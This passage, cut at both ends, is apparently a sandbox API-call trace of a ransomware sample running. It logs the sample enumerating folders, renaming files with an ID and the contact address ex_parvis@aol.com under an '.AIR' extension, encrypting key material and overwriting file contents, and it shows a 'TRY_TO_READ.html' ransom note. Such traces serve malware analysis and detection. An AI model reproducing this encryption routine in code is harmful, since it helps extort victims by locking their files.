(HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a68 [0116.563] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x3560d0 | out: pbBuffer=0x3560d0) returned 1 [0116.563] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330a68 | out: pbBuffer=0x330a68) returned 1 [0116.563] SetFileAttributesW (lpFileName="C:\\\\Users\\desktop.ini", dwFileAttributes=0x80) returned 1 [0116.563] lstrlenW (lpString="C:\\\\Users\\desktop.ini") returned 21 [0116.563] GetProcessHeap () returned 0x2e0000 [0116.563] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x90) returned 0x30e4b0 [0116.563] lstrcpyW (in: lpString1=0x30e4b0, lpString2="C:\\\\Users\\desktop.ini" | out: lpString1="C:\\\\Users\\desktop.ini") returned="C:\\\\Users\\desktop.ini" [0116.563] lstrcatW (in: lpString1="C:\\\\Users\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0116.563] MoveFileExW (lpExistingFileName="C:\\\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), lpNewFileName="C:\\\\Users\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0116.566] CreateFileW (lpFileName="C:\\\\Users\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3ec [0116.566] GetProcessHeap () returned 0x2e0000 [0116.566] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e4b0 | out: hHeap=0x2e0000) returned 1 [0116.566] GetFileSizeEx (in: hFile=0x3ec, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=174) returned 1 [0116.566] SetFilePointer (in: hFile=0x3ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xae [0116.566] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0116.566] GetProcessHeap () returned 0x2e0000 [0116.566] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x3561d8 [0116.566] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3561d8*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x3561d8*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0116.567] WriteFile (in: hFile=0x3ec, lpBuffer=0x3561d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3561d8*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0116.567] WriteFile (in: hFile=0x3ec, lpBuffer=0x330a68*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x330a68*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0116.567] WriteFile (in: hFile=0x3ec, lpBuffer=0x330a68*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x330a68*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0116.567] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xae) returned 0x33ab48 [0116.568] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xae) returned 0x33ac00 [0116.568] SetFilePointer (in: hFile=0x3ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.568] ReadFile (in: hFile=0x3ec, lpBuffer=0x33ab48, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33ab48*, lpNumberOfBytesRead=0x2acf9c8*=0xae, lpOverlapped=0x0) returned 1 [0116.568] SetFilePointer (in: hFile=0x3ec, lDistanceToMove=-174, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.568] WriteFile (in: hFile=0x3ec, lpBuffer=0x33ac00*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33ac00*, lpNumberOfBytesWritten=0x2acf9c8*=0xae, lpOverlapped=0x0) returned 1 [0116.568] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ab48 | out: hHeap=0x2e0000) returned 1 [0116.568] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ac00 | out: hHeap=0x2e0000) returned 1 [0116.568] CloseHandle (hObject=0x3ec) returned 1 [0116.569] GetProcessHeap () returned 0x2e0000 [0116.569] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3561d8 | out: hHeap=0x2e0000) returned 1 [0116.569] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3560d0 | out: hHeap=0x2e0000) returned 1 [0116.569] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a68 | out: hHeap=0x2e0000) returned 1 [0116.569] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.569] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.569] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328578 [0116.569] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3334b8 | out: hHeap=0x2e0000) returned 1 [0116.569] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x90) returned 0x30e4b0 [0116.569] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e008 | out: hHeap=0x2e0000) returned 1 [0116.569] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0116.569] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a8a0 | out: hHeap=0x2e0000) returned 1 [0116.569] FindFirstFileW (in: lpFileName="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x96f6f5b0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f6f5b0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x317d08 [0116.569] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.569] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.569] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328710 [0116.569] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.569] GetLastError () returned 0x0 [0116.569] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0116.569] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0116.569] GetLastError () returned 0x0 [0116.569] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.570] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.570] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.570] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a940 [0116.570] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317d48 [0116.570] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317d48 | out: hHeap=0x2e0000) returned 1 [0116.570] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.570] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.570] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a940 | out: hHeap=0x2e0000) returned 1 [0116.570] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.570] FindNextFileW (in: hFindFile=0x317d08, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x96f6f5b0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f6f5b0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.570] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0116.570] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.570] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328710 [0116.570] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.570] GetLastError () returned 0x0 [0116.570] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0116.570] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0116.570] GetLastError () returned 0x0 [0116.570] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.570] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.570] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.570] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a940 [0116.570] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317d48 [0116.570] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317d48 | out: hHeap=0x2e0000) returned 1 [0116.570] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.570] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.570] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a940 | out: hHeap=0x2e0000) returned 1 [0116.570] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.570] FindNextFileW (in: hFindFile=0x317d08, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0116.570] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0116.570] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.570] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328710 [0116.570] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.570] GetLastError () returned 0x0 [0116.571] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0116.571] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0116.571] GetLastError () returned 0x0 [0116.571] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a940 [0116.571] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.571] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.571] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.571] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.571] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a940 | out: hHeap=0x2e0000) returned 1 [0116.571] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x344ca0 [0116.571] FindNextFileW (in: hFindFile=0x317d08, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f6f5b0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96f6f5b0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f6f5b0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.571] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0116.571] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.571] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328710 [0116.571] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.571] GetLastError () returned 0x0 [0116.571] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0116.571] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0116.571] GetLastError () returned 0x0 [0116.571] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.571] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.571] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.571] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.571] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.571] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.571] FindNextFileW (in: hFindFile=0x317d08, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f6f5b0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96f6f5b0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f6f5b0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.571] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x312a78 [0116.571] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x3570d8 [0116.571] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a68 [0116.571] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x3570d8 | out: pbBuffer=0x3570d8) returned 1 [0116.571] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330a68 | out: pbBuffer=0x330a68) returned 1 [0116.571] SetFileAttributesW (lpFileName="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini", dwFileAttributes=0x80) returned 1 [0116.572] lstrlenW (lpString="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 75 [0116.572] GetProcessHeap () returned 0x2e0000 [0116.572] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfc) returned 0x3571e0 [0116.572] lstrcpyW (in: lpString1=0x3571e0, lpString2="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" | out: lpString1="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" [0116.572] lstrcatW (in: lpString1="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0116.572] MoveFileExW (lpExistingFileName="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), lpNewFileName="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0116.574] CreateFileW (lpFileName="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f0 [0116.574] GetProcessHeap () returned 0x2e0000 [0116.574] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3571e0 | out: hHeap=0x2e0000) returned 1 [0116.574] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=129) returned 1 [0116.574] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x81 [0116.574] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0116.574] GetProcessHeap () returned 0x2e0000 [0116.574] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x3571e0 [0116.574] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3571e0*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x3571e0*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0116.574] WriteFile (in: hFile=0x3f0, lpBuffer=0x3571e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3571e0*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0116.575] WriteFile (in: hFile=0x3f0, lpBuffer=0x330a68*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x330a68*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0116.575] WriteFile (in: hFile=0x3f0, lpBuffer=0x330a68*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x330a68*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0116.575] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x81) returned 0x3572e8 [0116.575] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x81) returned 0x357378 [0116.575] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.575] ReadFile (in: hFile=0x3f0, lpBuffer=0x3572e8, nNumberOfBytesToRead=0x81, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3572e8*, lpNumberOfBytesRead=0x2acf9c8*=0x81, lpOverlapped=0x0) returned 1 [0116.575] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=-129, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.576] WriteFile (in: hFile=0x3f0, lpBuffer=0x357378*, nNumberOfBytesToWrite=0x81, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x357378*, lpNumberOfBytesWritten=0x2acf9c8*=0x81, lpOverlapped=0x0) returned 1 [0116.576] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3572e8 | out: hHeap=0x2e0000) returned 1 [0116.576] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x357378 | out: hHeap=0x2e0000) returned 1 [0116.576] CloseHandle (hObject=0x3f0) returned 1 [0116.576] GetProcessHeap () returned 0x2e0000 [0116.576] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3571e0 | out: hHeap=0x2e0000) returned 1 [0116.576] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3570d8 | out: hHeap=0x2e0000) returned 1 [0116.576] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a68 | out: hHeap=0x2e0000) returned 1 [0116.576] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x312a78 | out: hHeap=0x2e0000) returned 1 [0116.576] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0116.576] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.577] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e4b0 | out: hHeap=0x2e0000) returned 1 [0116.577] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a878 | out: hHeap=0x2e0000) returned 1 [0116.577] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e080 | out: hHeap=0x2e0000) returned 1 [0116.577] FindFirstFileW (in: lpFileName="C:\\\\Boot\\cs-CZ\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x96f6f5b0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f6f5b0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x317d48 [0116.577] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0116.577] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.577] GetLastError () returned 0x0 [0116.577] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.577] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.577] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.577] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e008 [0116.577] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317d88 [0116.577] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317d88 | out: hHeap=0x2e0000) returned 1 [0116.577] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.577] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.577] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e008 | out: hHeap=0x2e0000) returned 1 [0116.577] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.577] FindNextFileW (in: hFindFile=0x317d48, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x96f6f5b0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f6f5b0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.577] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.577] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.577] GetLastError () returned 0x0 [0116.577] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.577] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.577] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.577] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e008 [0116.578] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317d88 [0116.578] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317d88 | out: hHeap=0x2e0000) returned 1 [0116.578] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.578] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.578] HeapFree (in: 